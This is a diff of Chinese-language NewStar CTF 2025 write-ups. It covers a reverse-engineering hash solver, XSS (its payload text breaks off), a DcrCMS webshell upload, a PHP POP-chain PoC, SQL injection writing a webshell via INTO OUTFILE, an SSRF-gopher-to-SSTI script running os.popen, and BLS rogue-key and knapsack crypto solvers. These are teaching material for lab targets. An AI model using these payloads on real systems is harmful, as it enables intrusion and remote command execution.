qword_7FF63D318150; + else + v5[31] += 2LL; + return 0xFFFFFFFFLL; +} + +unsigned __int64 __fastcall sub_7FF63D3120C9(__int64 a1, __int64 a2, __int64 a3, unsigned __int64 a4) +{ + _DWORD *v4; // rbx + unsigned __int64 result; // rax + _BYTE v6[11]; // [rsp+2Dh] [rbp-23h] BYREF + unsigned __int64 v7; // [rsp+38h] [rbp-18h] + size_t n3; // [rsp+40h] [rbp-10h] + unsigned __int64 i; // [rsp+48h] [rbp-8h] + + v7 = (a4 + 2) / 3; + *(_QWORD *)&v6[3] = a3; + for ( i = 0; ; ++i ) + { + result = i; + if ( i >= v7 ) + break; + *(_WORD *)v6 = 0; + v6[2] = 0; + if ( a4 >= 3 * (i + 1) ) + n3 = 3; + else + n3 = a4 - 3 * i; + memcpy(v6, (const void *)(a1 + 3 * i), n3); + v4 = (_DWORD *)(4 * i + *(_QWORD *)&v6[3]); + *v4 = sub_7FF63D3114C9(v6, 3); + } + return result; +} + +__int64 __fastcall sub_7FF63D3114C9(unsigned __int8 *a1, __int64 n3) +{ + int v2; // ebx + int i; // [rsp+28h] [rbp-8h] + unsigned int t; // [rsp+2Ch] [rbp-4h] + int m; // [rsp+58h] [rbp+28h] + + m = n3; + t = 114514; + for ( i = 0; i < m; ++i ) + { + v2 = (t << 19) + 8 * a1[i] + 19 * t; + t = v2 + 10 * rand_0(); + } + return t; +} +``` + +`0xC0000094` 是除零异常的标识符,说明这里在非调试状态下会注册除以零异常处理的handler,跳转至其中这个每3字节一哈希的加密,之后扫描了垃圾函数 `sub_7FF63D311648`,检索其中的特殊组合[65,66,67,68]并跳转至其后: + +```asm +seg035:00007FF63D3120B8 unk_7FF63D3120B8 db 58h ; X ; CODE XREF: sub_7FF63D311648+A6D↑j +seg035:00007FF63D3120B9 db 41h ; A +seg035:00007FF63D3120BA db 42h ; B +seg035:00007FF63D3120BB db 43h ; C +seg035:00007FF63D3120BC db 44h ; D +seg035:00007FF63D3120BD ; --------------------------------------------------------------------------- +seg035:00007FF63D3120BD mov eax, 0 +seg035:00007FF63D3120C2 add rsp, 78h +seg035:00007FF63D3120C6 pop rbx +seg035:00007FF63D3120C7 pop rbp +seg035:00007FF63D3120C8 retn +``` + +发现就是跳到了垃圾函数的结尾,那么也就是说程序中的RC4加密初始化以及密钥均是无效的,真正的加密逻辑是哈希运算,编写脚本解密: + +```cpp +#include +#include +#include +#include +#include + +const uint32_t expected_hash[16] = { + 0xE70F6EB4, + 0xB7741AEE, + 0x77B3F96C, + 0x3A7D82E4, + 0x0DF89E70, + 0x70C13CEC, + 0x55602656, + 0x94B4BC8A, + 0x43310CE4, + 0x5F357476, + 0xD724D53A, + 0x6DE31BB0, + 0xE5210B0E, + 0xA49BF77A, + 0xCF381F00, + 0x363ED066 +}; + +// Compute hash for 3-byte chunk using pre-recorded rand values +inline uint32_t compute_hash(uint8_t b0, uint8_t b1, uint8_t b2, int r0, int r1, int r2) { + uint32_t h = 114514; + h = ((h << 19) + h * 19U + 8U * b0 + 10U * static_cast(r0)); + h = ((h << 19) + h * 19U + 8U * b1 + 10U * static_cast(r1)); + h = ((h << 19) + h * 19U + 8U * b2 + 10U * static_cast(r2)); + return h; +} + +int main() { + const uint32_t SEED = 0x93E71989U; + std::srand(SEED); + + // Generate the exact 48 rand() values used in encryption + std::vector rands(48); + for (int i = 0; i < 48; ++i) { + rands[i] = std::rand(); + } + + std::cout << "Brute-forcing with ASCII range 32~126 (printable chars only)...\n\n"; + + std::vector plaintext; + + for (int group = 0; group < 16; ++group) { + uint32_t target = expected_hash[group]; + int r0 = rands[group * 3 + 0]; + int r1 = rands[group * 3 + 1]; + int r2 = rands[group * 3 + 2]; + + bool found = false; + for (int a = 32; a <= 126 && !found; ++a) { + for (int b = 32; b <= 126 && !found; ++b) { + for (int c = 32; c <= 126; ++c) { + if (compute_hash(a, b, c, r0, r1, r2) == target) { + plaintext.push_back(static_cast(a)); + plaintext.push_back(static_cast(b)); + plaintext.push_back(static_cast(c)); + std::printf("Group %2d: \"%c%c%c\" (0x%02X 0x%02X 0x%02X)\n", + group, a, b, c, a, b, c); + found = true; + break; + } + } + } + } + + if (!found) { + std::cerr << "[-] No valid printable ASCII triplet found for group " << group << "\n"; + return 1; + } + } + + // Output full result + std::cout << "\n[+] Decrypted plaintext (" << plaintext.size() << " bytes):\n"; + std::cout << "Raw: "; + for (char ch : plaintext) { + std::cout << ch; + } + std::cout << "\nHex : "; + for (char ch : plaintext) { + std::printf("%02X ", static_cast(ch)); + } + std::cout << "\n"; + + return 0; +} +``` + +`flag{C4tcH_th3_rUn71m3_3rr0R_0f_d1vId3D_8Y_z3R0}` diff --git a/docs/wp/2025/week4/web/e-message-board.md b/docs/wp/2025/week4/web/e-message-board.md new file mode 100644 index 0000000..2d9c059 --- /dev/null +++ b/docs/wp/2025/week4/web/e-message-board.md @@ -0,0 +1,53 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 小 E 的留言板 + +给了 webhook 很明显要打 XSS。 + +新建一个用户,随便写点什么提交,发现我们的输入以 input 标签的 value 值被注入了 html + +```html + +``` + +这里上 [Cross-site scripting (XSS) cheat sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) 找一个 input 元素的 payload 试一下,因为 bot 只是访问页面而不进行任何操作,所以我们就只能通过 `autofocus` + `onfocus` 或闭合标签后制造 ` + +# 武功秘籍 + + + +本题主要考查 CVE 信息检索与漏洞利用能力。 + + +## 前置分析 + +![题目描述中的 CMS 和 CVE 信息](/assets/images/wp/2025/week4/kungfu-manual_1.png) + +题目描述提供了 CMS、CVE 等有效信息,可以据此检索漏洞资料。 + +![CVE 资料检索结果](/assets/images/wp/2025/week4/kungfu-manual_2.png) + +除 CVE 之外,NVD、CNVD、CNNVD 等漏洞库也可以作为检索入口。遇到已知漏洞时,可以先确认是否存在对应 CVE,再检索是否有公开 PoC。 + +![DcrCMS 题目页面](/assets/images/wp/2025/week4/kungfu-manual_3.png) + +进入题目后,可以通过页面特征确认这是 DcrCMS 系统,随后检索该系统的公开漏洞。 + +![DcrCMS 漏洞利用资料](/assets/images/wp/2025/week4/kungfu-manual_4.png) + +检索后可以找到相关漏洞利用文章,按其中步骤进行验证即可。 + +## 解题过程 + +进入靶机后访问 `/dcr/login.htm`,发现登录界面,按 F12 可以看到注释。 + +![登录页面注释提示](/assets/images/wp/2025/week4/kungfu-manual_5.png) + +注释提示需要进行弱口令爆破,可以使用 Burp Suite 或其他爆破工具。最终得到账号密码为 `admin/admin`。 + +![Burp 爆破弱口令](/assets/images/wp/2025/week4/kungfu-manual_6.png) + +验证码存储在 Session 中,只要保持同一 Session,验证码就不会变化,因此可以复用该 Session 进行爆破。 + +![验证码 Session 复用](/assets/images/wp/2025/week4/kungfu-manual_7.png) + +进入后台后点击添加新闻类。 + +![后台添加新闻类](/assets/images/wp/2025/week4/kungfu-manual_8.png) + +再添加新闻。 + +![后台添加新闻](/assets/images/wp/2025/week4/kungfu-manual_9.png) + +![新闻内容编辑页面](/assets/images/wp/2025/week4/kungfu-manual_10.png) + +这里是文件上传漏洞点,抓包上传一句话木马。 + +![文件上传抓包修改](/assets/images/wp/2025/week4/kungfu-manual_11.png) + +将 Content-Type 改为 `image/jpeg` 后放行。上传成功后,进入「系统管理」-「文件管理器」,文件目录为根目录 `/uploads/news/2025_10_31`。 + +![后台文件管理器定位上传文件](/assets/images/wp/2025/week4/kungfu-manual_12.png) + +然后执行任意命令即可。 + +![WebShell 执行命令](/assets/images/wp/2025/week4/kungfu-manual_13.png) + +## 总结 + +本题的关键在于根据 CMS 信息检索对应 CVE 和公开 PoC。确认利用路径后,后续步骤本质上是一个文件上传漏洞利用。 diff --git a/docs/wp/2025/week4/web/lamb-maze.md b/docs/wp/2025/week4/web/lamb-maze.md new file mode 100644 index 0000000..3b2ee74 --- /dev/null +++ b/docs/wp/2025/week4/web/lamb-maze.md @@ -0,0 +1,349 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 小羊走迷宫 + +本题考点:非法变量名传参,PHP 反序列化 + +## 非法变量名传参 + +首先我们看到源码的传参部分内容 + +```php +if ($_GET["ma_ze.path"]){ + unserialize(base64_decode($_GET["ma_ze.path"])); +}else{ + echo "这个变量名有点奇怪,要怎么传参呢?"; +} +``` + +如果我们直接尝试传入 `?ma_ze.path=123` 会发现实际上没有反应 + +这是因为 PHP 会将变量名中的点和空格等字符解析为下划线 + +[https://www.php.net/manual/zh/language.variables.external.php](https://www.php.net/manual/zh/language.variables.external.php) + +![PHP 外部变量名说明](/assets/images/wp/2025/week4/lamb-maze_1.png) + +![变量名字符转换规则](/assets/images/wp/2025/week4/lamb-maze_2.png) + +同样的,`[` 也是一个会被转换为 `_` 的符号 + +但是在 PHP 版本小于 8 时,中括号 `[` 被转换成下划线 `_` 的行为会导致转换错误,使得接下来如果该参数名中还有 `非法字符` 并不会继续转换成下划线 `_` + +![PHP 修复中括号解析问题的提交](/assets/images/wp/2025/week4/lamb-maze_3.png) + +可以看见在 [php8 对这个 bug 修复的 commit](https://github.com/php/php-src/commit//fc4d462e947828fdbeac6020ac8f34704a218834?branch=fc4d462e947828fdbeac6020ac8f34704a218834&diff=unified) 中,原来的逻辑是只对 `[` 进行了一次替换,因此导致了这个问题 + +所以这里我们只需要传入 `ma[ze.path=123` 即可绕过 + +![绕过变量名转换](/assets/images/wp/2025/week4/lamb-maze_4.png) + +## 反序列化 + +下面在对反序列化部分进行分析之前,我们先来了解一下 PHP 反序列化 + +### PHP 反序列化基础 + +**序列化(Serialization)** 是指将数据结构或对象的状态转换为可以存储(如保存到文件、数据库)或传输(如通过网络发送)的格式的过程。反序列化则是这个过程的逆过程。 + +在 php 中,序列化和反序列化分别通过 `serialize()` 函数和 `unserialize()` 函数进行 + +`serialize()` 函数会将传入的对象转化成特定格式的字符串,不同类型的属性的序列化格式大致如下 + +```php + + string(8) "xnftrone" +} +*/ +``` + +### 魔术方法 + +PHP 为类设计了一系列的特殊方法,这些方法不需要被显式调用,而是在特殊事件发生时自动触发 + +它们一般是由 `__` 双下划线开头的 + +```plaintext +__construct() //对象创建(new)时会自动调用。 +__wakeup() //使用unserialize时触发 +__sleep() //使用serialize时触发 +__destruct() //对象被销毁时触发 +__call() //在对象上下文中调用不可访问的方法时触发 +__callStatic() //在静态上下文中调用不可访问的方法时触发 +__get() //用于从不可访问的属性读取数据 包括private或者是不存在的 +__set() //用于将数据写入不可访问的属性 +__isset() //在不可访问的属性上调用isset()或empty()触发 +__unset() //在不可访问的属性上使用unset()时触发 +__toString() //把类当作字符串使用时触发 +__invoke() //当脚本尝试将对象调用为函数时触发 就是加了括号 +__autoload() //在代码中当调用不存在的类时会自动调用该方法。 +``` + +所谓 pop 链,就是通过特殊的变量设计,使得魔术方法链式调用 + +举个简单的例子 + +```php +whoami . PHP_EOL; + } +} +class test2 +{ + function __toString() + { + echo "You get the flag!"; + return "hacker"; + } +} + +$test2 = new test2(); +$test1 = new test1(); + +$test1->whoami = $test2; +$ser = serialize($test1); + +unserialize($ser); + +# 输出 +# You get the flag!I'm hacker +``` + +在这个例子中,我们将 `$test1` 的 `$whoami` 属性设置为了 `$test2` + +随后我们通过 `unserialize($ser)` 触发了 `test1` 类的 `__wakeup()` 方法 + +在 `__wakeup()` 方法中,我们对 `$whoami` 变量进行了 `echo` 操作,如果 `$whoami` 是一个具有 `__toString()` 方法的类对象,那么这个方法会被调用,因此我们得到了以上结果 + +在这个例子中,pop 链是这样的: + +```php +test1.__wakeup -> test2.__toString +``` + +在实际做题过程中,我们可以从漏洞点开始一步一步往回找到反序列化触发点 + +### 解决问题 + +经过以上铺垫,我们可以开始尝试这道题目了 + +```php +direction; + return $way(); + } +} +class Treasure{ + protected $door; + protected $chest; + function __get($arg){ + echo "拿到钥匙咯,开门! "; + $this -> door -> open(); + } + function __toString(){ + echo "小羊真可爱! "; + return $this -> chest -> key; + } +} +class SaySomething{ + public $sth; + function __invoke() + { + echo "说点什么呢 "; + return "说: ".$this->sth; + } +} +class endPoint{ + private $path; + function __call($arg1,$arg2){ + echo "到达终点!现在尝试获取flag吧"."
"; + echo file_get_contents($this->path); + } +} +``` + +首先从 `include "flag.php";` 可以推测 FLAG 在 `flag.php` 中,因此可以很快注意到一个文件包含的函数 + +```php +class endPoint{ + private $path; + function __call($arg1,$arg2){ + echo "到达终点!现在尝试获取flag吧"."
"; + echo file_get_contents($this->path); + } +} +``` + +这就是我们的漏洞点,只需要使用 PHP filter 伪协议读取文件即可 + +> 当然文件包含还有其它的利用方式,感兴趣的 newstars 可以自行检索学习 + +想要调用 `__call()` 方法,我们需要调用这个类不可访问,或者是不存在的方法 + +```php +class Treasure{ + protected $door; + protected $chest; + function __get($arg){ + echo "拿到钥匙咯,开门! "; + $this -> door -> open(); + } + function __toString(){ + echo "小羊真可爱! "; + return $this -> chest -> key; + } +} +``` + +也就是这里的 `$door` 的值需要是上面的 `endPoint` 类对象 + +同理我们需要一个不可访问属性读取来触发 `__get`,直接使用同一个类的 `__toString()` 就可以做到 + +```php +class SaySomething{ + public $sth; + function __invoke() + { + echo "说点什么呢 "; + return "说: ".$this->sth; + } +} +``` + +利用 `.` 进行字符串拼接也会触发 `__toString()` + +```php +class startPoint{ + public $direction; + function __wakeup(){ + echo "gogogo出发咯 "; + $way = $this->direction; + return $way(); + } +} +``` + +最后在这里触发 `__invoke()`,同时这里也是反序列化的起点 + +> 如果你恰好卡在了 pop 链分析的某一步,走出旁边的小迷宫也能给到一些提示哦 + +![迷宫提示](/assets/images/wp/2025/week4/lamb-maze_5.png) + +最终的 pop 链如下 + +```php +startPoint.__wakeup -> SaySomething.__invoke -> Treasure.__toString -> +Treasure.__get -> endPoint.__call +``` + +PoC 如下: + +> 对于 `protected` 和 `private` 属性的一些参数在本题中没有影响,因此直接改为 public 即可 +> 当然你也可以选择使用反射来进行赋值 + +```php + direction = $say; + +$tr = new Treasure(); +$say -> sth = $tr; + +$tr2 = new Treasure(); +$tr -> chest = $tr2; +$tr2 -> door = new endPoint(); + +/* +endPoint.__call <- +Treasure.__get <- +Treasure.__toString <- +SaySomething.__invoke <- +startPoint.__wakeup + */ + +echo serialize($startPoint)."
\n"; +echo urlencode(serialize($startPoint))."
\n"; +echo base64_encode(serialize($startPoint))."
\n"; +``` + +![构造反序列化 payload](/assets/images/wp/2025/week4/lamb-maze_6.png) diff --git a/docs/wp/2025/week4/web/sqlupload.md b/docs/wp/2025/week4/web/sqlupload.md new file mode 100644 index 0000000..fe4b0a6 --- /dev/null +++ b/docs/wp/2025/week4/web/sqlupload.md @@ -0,0 +1,89 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# sqlupload + +## 代码审计 + +拿到题目源码后,我们重点关注两个文件:`src/upload.php` 和 `src/getFileList.php`。 + +### 文件上传 + +通常我们做上传题,会尝试上传 `.php` 后缀的文件。但查看 `upload.php` 的源码: + +```php +// src/upload.php 关键代码 +$stmt = $mysqli->prepare("INSERT INTO uploads (filename, content) VALUES (?, ?)"); +// ... +$stmt->send_long_data(1, $content); +$stmt->execute(); +``` + +我们发现: + +1. 用户上传的文件内容(content)和文件名(filename)被直接存入了 MySQL 数据库,而不是保存在 Web 服务器的磁盘目录中。 +2. 既然文件在数据库里,Apache/Nginx 就无法直接访问和解析它。这意味着我们就算上传了木马,也没法直接通过 URL 访问来触发执行。 + +### SQL 注入(`getFileList.php`) + +既然无法直接上传 Webshell,我们需要寻找其他突破口。查看 `getFileList.php`: + +```php +// src/getFileList.php 关键代码 +$order = $_GET['order'] ?? "upload_time"; + +// 脆弱的正则过滤 +if (!preg_match("/upload_time|id/", $order)) { + json_error("非法的 order 参数", 400); +} + +$sql = "SELECT id, filename, upload_time FROM uploads ORDER BY $order"; +$result = $mysqli->query($sql); +``` + +这里 `preg_match("/upload_time|id/", $order)` 这个正则表达式的意思是:只要字符串中 **包含** `upload_time` 或 `id` 就能通过检查。 + +这意味着我们可以构造 `upload_time; [恶意SQL]`,只要保留 `upload_time` 这个关键词,后面就可以跟随任意 SQL 语句,达成 SQL 注入。 + +## 利用 SQL 写文件 + +在 MySQL 中,有一个特殊的语法 `SELECT ... INTO OUTFILE 'file_path'`,它可以将查询结果导出到一个文件中。 + +如果我们能控制查询结果中的内容,并且利用这个注入漏洞把结果导出为 `.php` 文件,就能生成 Webshell。 + +**攻击链条**: + +1. **数据投毒**:利用 `upload.php`,将我们的 Webshell 代码伪装成 **文件名** 存入数据库。 +2. **导出文件**:利用 `getFileList.php` 的注入点,执行 `INTO OUTFILE`,将包含 Webshell 代码的数据库记录导出到 Web 目录下的 `.php` 文件中。 +3. **Get Flag**:访问生成的 PHP 文件,执行系统命令。 + +## 攻击 + +### 将文件名改为 Webshell + +我们需要上传一个文件,让它的文件名变成 PHP 代码。由于电脑文件系统不支持特殊字符(如 `?`, `<`, `>`),我们需要用 Burp Suite 抓包修改。 + +### 利用注入写入 Webshell + +我们需要构造一个 payload,触发数据库导出操作。 + +**确定路径**: +题目是 Docker 环境,Web 根目录通常是 `/var/www/html/`。我们打算把文件写入到 `/var/www/html/shell.php`。 + +**构造 Payload**: +我们要执行的 SQL 逻辑是: +`SELECT ... ORDER BY upload_time INTO OUTFILE '/var/www/html/shell.php'` + +根据正则要求(必须包含 `upload_time`),URL 参数应为: +`?order=upload_time INTO OUTFILE '/var/www/html/shell.php'` + +### Exploit + +```plaintext +/src/getFileList.php?order=upload_time%20INTO%20OUTFILE%20%27/var/www/html/shell.php%27 +``` + +如果页面没有报错,说明 SQL 执行成功。此时 MySQL 会把整张表的数据(包含我们刚才上传的恶意文件名)全部写入到 `shell.php` 中。 + +此时即可利用 `shell.php` 运行 `/readFlag` 拿到 FLAG。 diff --git a/docs/wp/2025/week4/web/ssti-where.md b/docs/wp/2025/week4/web/ssti-where.md new file mode 100644 index 0000000..094bcc7 --- /dev/null +++ b/docs/wp/2025/week4/web/ssti-where.md @@ -0,0 +1,68 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# SSTI 在哪里? + +## 审阅源码 + +审阅附件源码,首先我们需要注意 `docker-compose.yaml`, `Dockerfile` 和 `start.sh` 三个文件,这些是 [Docker](https://www.runoob.com/docker/docker-tutorial.html) 容器的配置文件,阅读它们我们可以知道 `index.php` 经过 apache 被暴露给我们(公网),内网还运行着两个 python 服务 `internal_web.py` 和 `app.py`。 + +我们在被暴露在公网的服务 `index.php` 中发现 `curl_exec` 函数有一个可控参数 `url`,`curl_exec` 是 `curl` 这个网络请求工具提供的 PHP 接口。CTF 中,我们常常使用它去访问一些内部服务来实现 SSRF。 + +`internal_web.py` 使用了危险的 `render_template_string` 方法渲染用户输入,可以实现 SSTI,但是服务仅仅绑定在 127.0.0.1:5001,外部无法访问。 + +`app.py` 同样是内网服务,提供了向 `internal_web.py` 的功能。 + +## 分析攻击链 + +这里存在一个很清晰的 SSRF 利用链,利用公网的 php 服务去携带 payload 请求内网 5000 端口的 `app.py`,触发 5001 端口的 `internal_web.py` 的 SSTI 漏洞达成 RCE。 + +但是如果只是使用 HTTP 协议,无法按照 python 源码中 `request.form` 的要求,以 POST 方法传递 payload,要想达到这一点,就必须去了解 gopher 协议。 + +gopher 协议被 curl 支持,能够达成发出 GET、POST 请求的效果。 + +在 gopher 协议中发送HTTP的数据,需要以下三步: + +1. 构造 HTTP 数据包 +2. URL 编码、替换回车换行为 %0d%0a (CRLF) +3. 发送 gopher 协议 + +注意 gopher 协议格式 + +```plaintext +gopher://ip:port/_后接TCP数据流 (就是经过上面1, 2步后得到的数据) +``` + +也就是我们只需要向 app.py 这个服务 post 传字段 name 即可。 + +## Exploit + +```python +### exp.py +import urllib.parse +import requests +import re + +payload = r'name={{lipsum.__globals__.os.popen("env").read()}}' +gopher_payload = ( + "POST / HTTP/1.1\r\n" + "Host: 127.0.0.1:5000\r\n" + "Content-Type: application/x-www-form-urlencoded\r\n" + f"Content-Length: {len(payload)}\r\n" + "\r\n" + f"{payload}" +) +fin_payload = urllib.parse.quote(gopher_payload) +gopher_url = f"gopher://127.0.0.1:5000/_{fin_payload}" + +print("生成的 gopher URL:") +print(gopher_url) +print() + +res = requests.post("http://127.0.0.1:20001/",data={"url": gopher_url},timeout=1) +re_pattern = re.compile(r'ICQ_FLAG=(.*?)\n') +result = re_pattern.findall(res.text)[0] + +print(result) +``` diff --git a/docs/wp/2025/week5/crypto/bls-multisig-zero.md b/docs/wp/2025/week5/crypto/bls-multisig-zero.md new file mode 100644 index 0000000..5a531bc --- /dev/null +++ b/docs/wp/2025/week5/crypto/bls-multisig-zero.md @@ -0,0 +1,240 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# BLS 多重签名:零的裂变 + +这是一个关于 BLS(Boneh-Lynn-Shacham)签名系统中多重签名漏洞的题目。 + +### BLS 签名基础知识 + +1. BLS 签名基本概念 + +BLS 是一种基于椭圆曲线配对的数字签名方案。私钥 $sk$ 是一个随机数,公钥 $pk = sk \times G$,其中 $G$ 是椭圆曲线的生成元。签名 $\sigma = sk \times H(m)$,其中 $H(m)$ 是将消息映射到椭圆曲线上的哈希函数。 + +2. BLS 签名的线性特性 + +BLS 签名有一个重要的数学特性是线性。这意味着,公钥可以叠加,即 $pk_1 + pk_2 = (sk_1 + sk_2) \times G$;签名也可以叠加,即 $\sigma_1 + \sigma_2 = (sk_1 + sk_2) \times H(m)$。 + +3. 多重签名验证 + +在多重签名中,多个参与者共同对同一消息签名时,聚合公钥等于所有参与者的公钥之和,聚合签名等于所有参与者的签名之和,验证时检查 $e(\text{聚合公钥}, H(m)) = e(G, \text{聚合签名})$。 + +### 题目漏洞分析 + +关键漏洞:未检测零公钥攻击 + +题目中的关键检查: + +```python +# 检查聚合公钥是否等于服务器公钥 +agg_pk = bls._AggregatePKs(pks_bytes) +if agg_pk != self.pk_server: + return False, "Aggregate PK must equal server PK" +``` + +这里要求我们提供的三个公钥的聚合结果必须等于服务器的公钥。正常情况下这很难做到,但利用 BLS 的线性特性,我们可以构造特殊的密钥对来绕过这个检查。 + +如果我们能找到两个私钥 $sk_1$ 和 $sk_2$,使得 $sk_1 + sk_2 = 0 \pmod{order}$。 + +那么对应的公钥 $pk_1 + pk_2 = (sk_1 + sk_2) \times G = 0 \times G = 零点$。 + +这样,如果我们构造:用户公钥 1 为 $pk_1$,用户公钥 2 为 $pk_2$,服务器公钥为 $pk_{server}$。 + +那么三个公钥的聚合结果为 $pk_1 + pk_2 + pk_{server} = 零点 + pk_{server} = pk_{server}$。 + +这样就绕过了聚合公钥的检查。 + +### 具体解题步骤 + +1. 生成攻击密钥对 + +```python +# 选择任意私钥值 +x1 = 1337 +# 计算对应的公钥 +pk1 = bls.SkToPk(x1) + +# 计算另一个私钥,使得两个私钥和为 0(模 order) +x2 = order - x1 +pk2 = bls.SkToPk(x2) +``` + +这里 $x_1 + x_2 = order \equiv 0 \pmod{order}$,所以 $pk_1 + pk_2 = 零点$。 + +2. 注册两个公钥 + +分别用两个私钥对消息 `"POP"` 签名,生成证明(Proof of Possession),然后注册两个公钥。 + +```python +# 为第一个公钥生成 POP +pop1 = bls.Sign(x1, b"POP").hex() +# 注册第一个公钥 +发送: {'type': 'register', 'pk': pk1_hex, 'pop': pop1} + +# 为第二个公钥生成 POP +pop2 = bls.Sign(x2, b"POP").hex() +# 注册第二个公钥 +发送: {'type': 'register', 'pk': pk2_hex, 'pop': pop2} +``` + +3. 获取服务器签名 + +```python +# 请求服务器对"get_flag"签名 +发送: {'type': 'sign', 'msg': 'get_flag'} +接收: 服务器对"get_flag"的签名 +``` + +4.构造攻击获取 FLAG + +```python +# 构造三个公钥的列表 +pks_list = [pk1_hex, pk2_hex, server_pk_hex] + +# 提交获取 FLAG 的请求 +发送: { + 'type': 'get_flag', + 'pks': pks_list, + 'sig': server_sig_hex +} +``` + +完整 EXP: + +```python +#!/usr/bin/env python3 +from pwn import * +import json +import secrets +from py_ecc.bls import G2ProofOfPossession as bls + +# BLS12-381 曲线参数 +order = 52435875175126190479447740508185965837690552500527637822603658699938581184513 + +def solve(host='127.0.0.1', port=9999): + # 连接服务器 + io = remote(host, port) + + try: + # 1. 获取服务器信息 + io.sendline(json.dumps({'type': 'get_info'}).encode()) + response = json.loads(io.recvline().decode()) + + if not response['success']: + log.error(f"Failed to get server info: {response['message']}") + return + + info = response['message'] + server_pk_hex = info['server_pk'] + log.info(f"Server PK: {server_pk_hex}") + log.info(f"Server PK length: {len(server_pk_hex)}") + + # 2. 生成攻击密钥对 + log.info("Generating malicious key pair...") + x1 = 1337 # 先用固定值测试 + pk1 = bls.SkToPk(x1) + pk1_hex = pk1.hex() + + x2 = order - x1 + pk2 = bls.SkToPk(x2) + pk2_hex = pk2.hex() + + log.info(f"PK1: {pk1_hex}") + log.info(f"PK1 length: {len(pk1_hex)}") + log.info(f"PK2: {pk2_hex}") + log.info(f"PK2 length: {len(pk2_hex)}") + + # 3. 注册第一个公钥 + log.info("Registering PK1...") + pop1 = bls.Sign(x1, b"POP").hex() + log.info(f"POP1 length: {len(pop1)}") + + io.sendline(json.dumps({ + 'type': 'register', + 'pk': pk1_hex, + 'pop': pop1 + }).encode()) + + response = json.loads(io.recvline().decode()) + log.info(f"Register PK1 response: {response}") + if not response['success']: + log.error(f"Register PK1 failed: {response['message']}") + return + log.success("PK1 registered") + + # 4. 注册第二个公钥 + log.info("Registering PK2...") + pop2 = bls.Sign(x2, b"POP").hex() + log.info(f"POP2 length: {len(pop2)}") + + io.sendline(json.dumps({ + 'type': 'register', + 'pk': pk2_hex, + 'pop': pop2 + }).encode()) + + response = json.loads(io.recvline().decode()) + log.info(f"Register PK2 response: {response}") + if not response['success']: + log.error(f"Register PK2 failed: {response['message']}") + return + log.success("PK2 registered") + + # 5. 获取服务器对 "get_flag" 的签名 + log.info("Getting server signature for 'get_flag'...") + io.sendline(json.dumps({'type': 'sign', 'msg': 'get_flag'}).encode()) + response = json.loads(io.recvline().decode()) + log.info(f"Sign response: {response}") + + if not response['success']: + log.error(f"Get signature failed: {response['message']}") + return + + server_sig_hex = response['message'] + log.info(f"Server signature: {server_sig_hex}") + log.info(f"Server signature length: {len(server_sig_hex)}") + + # 6. 构造攻击并获取 FLAG + log.info("Constructing attack...") + pks_list = [pk1_hex, pk2_hex, server_pk_hex] + + log.info("Submitting PKs:") + for i, pk in enumerate(pks_list): + log.info(f" PK{i + 1}: {pk[:32]}... (len: {len(pk)})") + + io.sendline(json.dumps({ + 'type': 'get_flag', + 'pks': pks_list, + 'sig': server_sig_hex + }).encode()) + + response = json.loads(io.recvline().decode()) + log.info(f"Get FLAG response: {response}") + + if response['success']: + FLAG = response['message'] + log.success(f"🎉 FLAG: {FLAG}") + else: + log.error(f"Failed to get FLAG: {response['message']}") + + except Exception as e: + log.error(f"Error: {e}") + import traceback + traceback.print_exc() + finally: + io.close() + +if __name__ == '__main__': + import argparse + + parser = argparse.ArgumentParser(description='BLS Splitting Zero Attack') + parser.add_argument('--host', default='47.104.154.99', help='Server host') + parser.add_argument('--port', type=int, default=9999, help='Server port') + + args = parser.parse_args() + + context.log_level = 'info' + + solve(host=args.host, port=args.port) +``` diff --git a/docs/wp/2025/week5/crypto/no-peek-meow.md b/docs/wp/2025/week5/crypto/no-peek-meow.md new file mode 100644 index 0000000..acb7cc8 --- /dev/null +++ b/docs/wp/2025/week5/crypto/no-peek-meow.md @@ -0,0 +1,109 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 不给你看喵 + + + +本题考查 01 背包问题与零知识证明的结合。 + + +题目脚本如下: + +```python +import random +import math +from secret import FLAG + +p=225791639467198034995070527100776477487 +g=3 +h=5 + +def round(n): + a=[random.randint(1,p-1) for _ in range(n)] + x=[random.randint(0,1) for _ in range(n)] + t=sum(a[i]*x[i] for i in range(n)) + print(a) + print(t) # 此处可以通过格规约恢复 x。 + + C=[] # C 是选手输入的数组,用于证明其知道 x 的每一位。 + for _ in range(n): + bit=int(input("Every bit: ")) + C.append(bit) + + s=[random.randint(1,p-1) for _ in range(n)] + print(s) + + S=int(input(">")) + R=int(input(">")) + + assert R>S + assert S==sum(s[i]*x[i] for i in range(n)) # S 必须是 s 的子集和。 + assert all(C[i]>1 for i in range(n)) # C 的每个元素都需要大于 1。 + assert math.prod(pow(C[i],s[i],p) for i in range(n))%p==pow(g,S,p)*pow(h,R,p)%p + +round(16) + +print(FLAG) +``` + +核心约束是最后一个 `assert` 语句: + +$$\prod_{i}C[i]^{s[i]} =g^Sh^R\pmod{p}$$ + +将其改写为: + +$$\prod_{i}C[i]^{s[i]} =g^{\sum_i s[i]x[i]}h^R=(\prod_ig^{s[i]x[i]})h^R \pmod{p}$$ + +`R` 由选手提交,因此可以令: + +$$R=\sum_i s[i]r[i]$$ + +其中 `r` 是自行选择的数组。代入后可得: + +$$\prod_{i}C[i]^{s[i]} =g^{\sum_i s[i]x[i]}h^{\sum_is[i]r[i]}=\prod_ig^{s[i]x[i]}h^{s[i]r[i]}\pmod{p}$$ + +因此构造: + +$$C[i]=g^{x[i]}h^{r[i]}$$ + +同时需要满足 `R > S`,即保证: + +$$\sum_i r[i]>\sum_i x[i]$$ + +至此可以通过格规约恢复 `x`,再按上述方式构造 `C`、`S`、`R` 完成交互。 + +参考脚本如下: + +```python +a= +t= + +p= +n=16 + +Ge=matrix(ZZ,n+1,n+1) +for i in range(n): + Ge[i,i]=1 + Ge[i,-1]=a[i] +Ge[-1,-1]=-t +Ge=Ge.LLL() +x=list(Ge[0])[:-1] +print(x) + +import random +g=3 +h=5 +r=[1]*16 +C=[g^x[i]*h^r[i] for i in range(n)] +print(C) +s= 